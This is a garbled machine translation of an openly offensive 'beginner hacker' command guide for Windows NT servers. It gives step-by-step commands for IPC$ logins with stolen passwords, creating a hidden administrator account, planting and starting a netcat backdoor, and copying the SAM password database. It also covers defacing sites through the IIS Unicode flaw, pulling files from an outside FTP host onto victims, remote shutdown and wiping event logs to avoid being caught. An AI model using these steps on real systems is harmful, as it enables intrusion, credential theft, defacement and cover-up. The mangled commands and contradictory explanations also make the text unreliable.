Cainiao hacker entry command collection

1. NET

As long as you have the user name and password of an IP address, use IPC $ for connection!

Here we assume that the user you get is X 1 and the password is 123456. Assume that the Peer IP address is 127.0.0.1.

Net use \ 127.0.0.1 \ ipc $123456/user: FLAC

The exit command is

Net use \ 127.0.0.1 \ ipc $/delte

The following operations can be used only after you log on.

The following describes how to create a user, because the SA permission is equivalent to the super user of the system. We add a heibai User Password lovechina

Net user heibai lovechina/add

If the command is successfully displayed, we can add it to the Administrator group.

Net localgroup Administrators heibai/add

Here we will talk about ing the C disk of the other party. Of course, other disks can also be used as long as they exist. Here we map the disk C of the other party to the local disk Z,

Net use z: \ 127.0.0.1 \ c $
Net start telnet

In this way, you can open the TELNET service of the other party.
Here we will activate the Guest user. The guest is the default user of NT and cannot be deleted? I don't know if this is the case. My Windows2000 won't be able to delete it.

Here we change the password of a user to lovechina. Other users can also change the password of guest. As long as you have the permission!

Net user guest lovechina

Net command is really powerful!

2.

Generally, a hacker will leave a backdoor after intrusion, that is, a Trojan Horse. How can you start the trojan when you upload it? Use the AT command. Assume that you have logged on to the server. First, you need to get the time of the other party,

Net time \ 127.0.0.1

A time is returned. Assume that the time is. Now you need to create a new job with ID = 1.

At \ 127.0.0.1 12:3 nc.exe

Assume that a trojan named NC. EXE is stored on the server of the other party.

The NC is short for NETCAT. It is renamed to facilitate input. It is a TELNET service with port 99. At, we can connect to the other party's port 99, so that we can plant a Trojan horse for the other party.

3. Telnet

This command is very practical. It can be used to connect to a remote location, but the password and user are required normally, but you have planted a trojan for the other party and directly connected to the port opened by the Trojan.

Telnet 127.0.0.1 99

In this way, you can connect to the other party's port 99, and then you can run the command on the other party, that is, the zombie.
4. FTP

It can upload your stuff to the other machine, and you can apply for a space that supports FTP upload. In China, if you cannot find it, I will give www.51.NET, which is good. After the application is completed, it will give the user name, password, and FTP server. Before uploading, You need to log in first. Here we assume that the FTP server is www.51.NET, the user name is HUCJS, And the password is 654321.

Ftp http://www.51.net

He will ask the user to enter the password.
Next, let's talk about uploading. Assume that the file you want to upload is INDEX. HTM, which is located in C: \ and uploaded to the other party's D :\

Get c: \ index.htm d :\

Suppose you want to put INDEX. HTM under drive C of the other party to drive D of your machine.

Put c: \ index.htm d :\

5. Copy

Next, let's talk about how to copy a local file to the hard disk of the other party. You need to establish an IPC $ connection. Copy the index.htm under the C drive to the C drive of 127.0.0.1.

Copy index.htm \ 127.0.0.1 \ c $ \ index.htm

If you want to copy C to drive D and change C to drive D, that's all!

If you want to copy it to the WINNT directory, You need to input

Copy index.htm \ 127.0.0.1 \ admin $ \ index.htm

Admin $ is winnt

Copy the other party's files and tell everyone that the NT backup database is stored in x: \ winnt \ repair \ sam. _ sam. _, which is the database file name. Copy the database of 127.0.0.1 to the local drive C.

Copy \ 127.0.0.1 \ admin $ \ repair \ sam. _ c :\

6. Set

If you run into a machine and want to blacklist him (this idea can only be available in special cases), of course, port 80 should be enabled, or you may want to blacklist him or her. In this case, use the SET command! The following is my result! I will analyze it, just find the home page.

COMPUTERNAME = PENTIUMII
ComSpec = D: \ WINNT \ system32 \ cmd.exe
CONTENT_LENGTH = 0
GATEWAY_INTERFACE = CGI/1.1.
HTTP_ACCEPT = */*
HTTP_ACCEPT_LANGUAGE = zh-cn
HTTP_CONNECTION = Keep-Alive
HTTP_HOST = IP address of the current login user. The IP address is displayed and deleted.
HTTP_ACCEPT_ENCODING = gzip, deflate
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS = 1
Os2LibPath = D: \ WINNT \ system32 \ os2 \ dll;
OS = Windows_NT
Path = D: \ WINNT \ system32; D: \ WINNT
PATHEXT =. COM;. EXE;. BAT;. CMD
PATH_TRANSLATED = E: \ vlroot: Address of the home page, as long as you see that PATH_TRANSLATED = is followed by the home page storage location
Address. Here is E: \ vlroot
PROCESSOR_ARCHITECTURE = x86
PROCESSOR_IDENTIFIER = x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL = 6
PROCESSOR_REVISION = 0303
PROMPT = $ P $ G
QUERY_STRING =/c + set
REMOTE_ADDR = XX. XX
REMOTE_HOST = XX. XX
REQUEST_METHOD = GET
SCRIPT_NAME =/scripts/... % 2f ../winnt/system32/cmd.exe
SERVER_NAME = XX. XX
SERVER_PORT = 80
SERVER_PORT_SECURE = 0
SERVER_PROTOCOL = HTTP/1.1
SERVER_SOFTWARE = Microsoft-IIS/3.0 the other party uses IIS/3.0
SystemDrive = D:
SystemRoot = D: \ WINNT
Z = GMT-9
USERPROFILE = D: \ WINNT \ Profiles \ Default User
Windir = D: \ WINNT

The pink line is the address of the home page of the other party. This is a very stupid skill. However, you can only use this method to find the name of the home page in 100%, when you DIR this directory, you will certainly see a lot of files, you can put all the files in the browser such as XX. XX. XX. XX/file name, as long as you see and XX. XX. XX. XX sees exactly the same face, so this is the name of the home page.

7. Nbtstat

If you scan an NT host and one of the ports from 136 to 139 is enabled, you need to use this command to get the user. By the way, this is netbios. You can guess the password after obtaining the user name. For example, you can try a simple password with the same password as the user name. If not, just crack it!

Now many NT hosts on the Internet have opened these ports. You can practice and analyze the results. Command is

Nbtstat-a xx. XX

-A must be capitalized. The following figure shows the result.

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Reg
Istered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet ~ Services <1C> GROUP
IS ~ PENTIUMII... <00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
. _ MSBROWSE _. <01> GROUP

The pink one is the user who has logged on to this system. Maybe you don't know what to think. Do you see a number? As long as the number is <03>, the user is in front of him, and the user here is PENTIUMII.

8. Shutdown

Shut down the other's NT server command

Shutdown \ IP address t: 20

In 20 seconds, NT will be automatically disabled, and this command can only be run after thinking twice. This will cause a great loss to the other party, and a conscientious hacker will be required.

9. DIR

This command has nothing to say but is very important. It is used to view all the files and folders in a directory. You can try it locally.

10. Echo

The famous Unicode vulnerability, which can be used to easily hack hosts with this vulnerability. Let's assume that we want to prove that "the Nanjing massacre is a mountain, and no *** can deny it !" There are two methods to write data into index.htm. Let's see what the difference is.

Echo: the Nanjing massacre is like a mountain, so no *** can deny it!> Index.htm

Echo: the Nanjing massacre is like a mountain, so no *** can deny it!> Index.htm

The first idea is to overwrite the original content of index.htm, and prove that "the Nanjing massacre is like a mountain. No *** can afford it !" Written into index.htm; the second is to prove that "the Nanjing massacre is like a mountain. No *** can deny this !" Add it to index.htm.

">" Will be appended to the file, and ">" will overwrite the original file. You can try it locally.

You may ask, in this case, what is interesting? In fact, it can be used to download the home page to the directory of the other party.

(1) first, we need to apply for a free home page.

(2) Use echo to create a txt file in a writable directory: (take the chinren server as an example .)

Open upload.chinaren.com)
Cnhack (user name when you apply)
Test (password when you apply)
Get index.htm c: \ inetpub \ wwwroot \ index.htm
(Download the index.htm on your space to the other's c: \ inetpub \ wwwroot \ index.htm)
Bye (exit ftp conversation, equivalent to DOS under 98, exit dos with EXIT)

Specific Practices:

Input echo open upload.chinaren.com> c: \ cnhack.txt
Input echo cnhack> c: \ cnhack.txt
Input echo 39abs> c: \ cnhack.txt
Input echo get index.htm c: \ inetpub \ wwwroot \ index.htm +> + c: \ cnhack.txt

Finally, enter ftp-s: c: \ cnhack.txt (use the ftp-s parameter to execute the content in the file .) When the command is complete, the file has been downloaded to your specified file.

Note: after obtaining the file, delete cnhack.txt. (If you do not delete the password, it is easy to show it to others .) Remember del c: \ cnhack.txt.

11. Attrib

This command sets the file attributes. If you want to blacklist a website and set the file attribute of its home page to read-only, it will be very poor. If you want to delete it, you will not be able to overwrite it. But don't be afraid of this command.

Attrib-r index.htm

This command removes the read-only attribute of index.htm. If you change "-" to "+", the attribute of this file is set to read-only.

Attrib + r index.htm

This command sets the index.htm attribute to read-only.

12. Del

Don't fall down when you see this title! Now we are leaving 127.0.0.1. to delete the log, you must delete the log! Do you want to be caught. NT logs have these

Del C: \ winnt \ system32 \ logfiles \*.*
Del C: \ winnt \ ssytem32 \ config \ *. evt
Del C: \ winnt \ system32 \ dtclog \*.*
Del C: \ winnt \ system32 \ *. log
Del C: \ winnt \ system32 \ *. txt
Del C: \ winnt \ *. txt
Del C: \ winnt \ *. log

You only need to delete this. Some system NT is installed on disk D or other disks, and C should be changed to another disk.

---------------------------------------------------------------------